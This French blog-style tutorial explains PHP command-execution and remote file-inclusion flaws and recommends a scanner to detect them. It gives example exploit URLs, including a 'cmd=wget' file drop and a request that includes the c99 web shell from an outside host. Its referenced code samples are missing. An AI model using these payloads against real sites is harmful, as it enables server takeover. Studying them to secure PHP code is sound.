Etude des failles les plus dangereuses du PHP

La langue PHP est une langue mondiale très connu par sa puissance et la facilitée d’apprendre cette langue et c’est pour cela elle est très populaire et entrouvre de nombreux application créer avec cette langue que se soit des forum des cms …

Le point noir de cette langue c’est le coté sécurité surtout pour les débutants

1-faille command exécution

Ce genre de faille arrive lors de l’utilisation de la fonction de command d’exécution dans la langue PHP d’une façon non correcte, comment sa ?

Les fonction command exécution sont des fonctions qui vous permet d’executer des programme de système directement sans avoir à ecrire plusieur ligne de code ,une erreur dans une fonction permet à l’attaquant d’executer des programme sur le serveur , par exemple le programme sendmail usr/sbin/sendmail/ .

Les fonction command execution qui execute les command directement sont :

Exec , shell_ , popen , system .

Exemple

Regardez le code suivant :

Si vous avez cette fonction dans votre application sa veut dire que vous avez une faille command execution .

L’exploiatation de la faille se fait comme suivant :

www.votresite.com/index.php?cmd= nom du programme que vous voulez executer

par exemple on peut choisir :

www.votresite.com/index.php?cmd=ls >> pour afficher tous les dossiers du serveurs

www.jaascois.com/index.php?cmd=wget xxxxx >> pour mettre un fichier dans le serveur en utlisant le programme wget .

vous croyer peut etre que c’est facile de détecter ces fonction de command mais si vous avez des dizaine de pages comment allez vous faire ???

heureusement il y a des programmes pour sa et on vas choisir le programme JAAScois X-code v1.0

un programme simple et puissant

2-les failles fileinclusion

Ce genre de faille très dangereux puisqu’il permet à l’attaquant de hacker votre site .

L’inclusion permet la lecture et l’exécution d’un fichier déterminé dans la page actuelle

La fonction inclusion est utilise pour faciliter la tache du codeur php pour ne pas écrire le même code plusieurs fois.

Les fonctions d’inclusion sont :

Include , file , fopen , require ,include_once ,require_once

Si on veut par exemple inclure le fichier index.php on va ecrire include(‘index.php’) ;

Mais si le code est ecrit comme sa

on peut exploiter cette faille pour inclure un web shell (des applications écrites avec la langue PHP qui comprend une interface de gestion de site comme ajouté effacé upload download ...) .

L’exploitations s’écrit comme sa

www.monsite.com/index.php?page=lien-du-shellpar exemple www.monsite.com/index.php?page=www.hack.com/shell-/c99.php

la fonction d’inclusion permettras la lecture et l’exécution de l’application sur votre site

voici un exemple d’un web shell le plus connu c99 .

comme vous pouvez constatez il y as tous les informations concernant votre site ….

On peut utiliser le même programme pour détecter les failles includes dans un script surtout si on a un beaucoup de script et beaucoup ligne de command

c’était une petite étude pour vous montrez les plus dangereux faille de la langue php et rendez vous pour les faille XSS et les injections SQL prochainement .

Remarque : quand vous utilisé le programme jaascois x-code pour scanner un script le programme affiche plusieurs ligne de code mais sa ne veut pas dire que tous ces fonction sont vulnérable mais sa veut seulement dire que se sont des fonctions qui peuvent être vulnérable et c’est à vous de les vérifier vous-même soit par vérifier le code source du script soit en essayant d’exploiter la faille par le navigateur web.

Attention : ceci est juste cour à titre informatif et non pas une incitation pour abuser ou faire

mal aux autres